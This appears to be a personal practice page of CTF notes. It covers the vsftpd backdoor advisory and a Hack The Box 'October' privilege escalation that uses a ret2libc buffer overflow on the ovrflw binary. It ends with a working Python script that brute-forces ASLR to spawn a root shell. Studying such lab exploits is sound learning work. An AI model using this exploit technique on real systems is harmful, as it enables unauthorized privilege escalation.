Skip to content

Practice

vsftpd backdoor

  • https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

HTB - Octomber

/usr/local/bin/ovrflw

NX/DEP is enabled. ASLR is enabled.

Passing a pattern to the binary in gdb finds that there is 112 bytes before the buffer is overflowed and the EIP is overwritten.

  • Path and libc address: ldd /usr/local/bin/overflw | grep libc​
  • System offset: readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

  • "bin/sh" address: strings -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

  • Payload: ​ JUNK112 + libcAddress + JUNK8 + binShAddress

  • Brute forces the binary to bypass ASLR. Note it may take hundreds if not several thousand attempts to hit the correct address.

import struct, subprocess

libcBase = 0xb75eb000
systemOffset = 0x00040310
binShOffset = 0x00162bac

libcAddress = struct.pack("<I", libcBase+systemOffset)
exitAddress = struct.pack("<I", 0xd34db33f)
binShAddress = struct.pack("<I", libcBase+binShOffset)

payload = "\x90"*112
payload += libcAddress
payload += exitAddress
payload += binShAddress

i = 0
while True:
  i += 1
  if i%10 == 0:
    print "Attempts: " + str(i)
  subprocess.call(["/usr/local/bin/ovrflw", payload])